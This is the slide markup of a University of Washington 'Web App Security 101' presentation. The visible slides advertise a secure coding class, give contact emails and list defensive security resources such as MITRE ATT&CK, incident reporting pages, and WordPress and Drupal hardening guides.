          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="E9F387"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="E9F387"/>
                </a:highlight>
                <a:latin typeface="Open Sans ExtraBold"/>
                <a:ea typeface="Open Sans ExtraBold"/>
                <a:cs typeface="Open Sans ExtraBold"/>
                <a:sym typeface="Open Sans ExtraBold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="E9F387"/>
                </a:highlight>
                <a:latin typeface="Open Sans ExtraBold"/>
                <a:ea typeface="Open Sans ExtraBold"/>
                <a:cs typeface="Open Sans ExtraBold"/>
                <a:sym typeface="Open Sans ExtraBold"/>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" xmlns="" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>ciso@uw.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="E9F387"/>
                </a:highlight>
                <a:latin typeface="Open Sans ExtraBold"/>
                <a:ea typeface="Open Sans ExtraBold"/>
                <a:cs typeface="Open Sans ExtraBold"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="E9F387"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>with "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="E9F387"/>
                </a:highlight>
                <a:latin typeface="Open Sans ExtraBold"/>
                <a:ea typeface="Open Sans ExtraBold"/>
                <a:cs typeface="Open Sans ExtraBold"/>
                <a:sym typeface="Open Sans ExtraBold"/>
              </a:rPr>
              <a:t>Advocates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="E9F387"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>" in the subject line.</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="E9F387"/>
              </a:highlight>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>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7">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="200"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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7">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="200"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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7">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="200"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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Take a secure coding class</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="273" name="Google Shape;273;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="417400" y="1640675"/>
            <a:ext cx="8520600" cy="3114300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-361950" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Get hands-on experience hacking a vulnerable web application</a:t>
            </a:r>
            <a:endParaRPr sz="2100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-361950" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Explore common vulnerabilities such as XSS, SQL injection, and web parameter tampering</a:t>
            </a:r>
            <a:endParaRPr sz="2100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-361950" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>3 hours</a:t>
            </a:r>
            <a:endParaRPr sz="2100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-361950" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Now, for a limited time, all online!</a:t>
            </a:r>
            <a:endParaRPr sz="2100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="E9F387"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Contact Pete Graff (UW-IT Slack or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="E9F387"/>
                </a:highlight>
                <a:latin typeface="Open Sans ExtraBold"/>
                <a:ea typeface="Open Sans ExtraBold"/>
                <a:cs typeface="Open Sans ExtraBold"/>
                <a:sym typeface="Open Sans"/>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" xmlns="" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>pgraff@uw.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="E9F387"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="2100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="E9F387"/>
              </a:highlight>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274" name="Google Shape;274;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="11711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500"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Web App Security 101: Thinking Like an Attacker</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>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3">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="100"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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3">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="100"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="27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3">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="100"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="27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3">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="100"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="27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3">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="100"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="27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Resources (2 of 2)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="280" name="Google Shape;280;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="387900" y="1296550"/>
            <a:ext cx="8520600" cy="35838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Clr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>MITRE ATT&amp;CK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://attack.mitre.org/</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-330200" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Incident reporting: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" xmlns="" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://ciso.uw.edu/report/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" xmlns="" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://privacy.uw.edu/report/</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-330200" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>CISO online training: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
                <a:hlinkClick r:id="rId6">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" xmlns="" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://ciso.uw.edu/education/online-training/</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-330200" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
                <a:hlinkClick r:id="rId7">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" xmlns="" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Hardening Wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
                <a:hlinkClick r:id="rId8">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" xmlns="" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Security in Drupal</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-330200" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Wordpress security alerting: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
                <a:hlinkClick r:id="rId9">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" xmlns="" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://wpscan.com/</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-330200" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Drupal security alerting: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
                <a:hlinkClick r:id="rId10">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
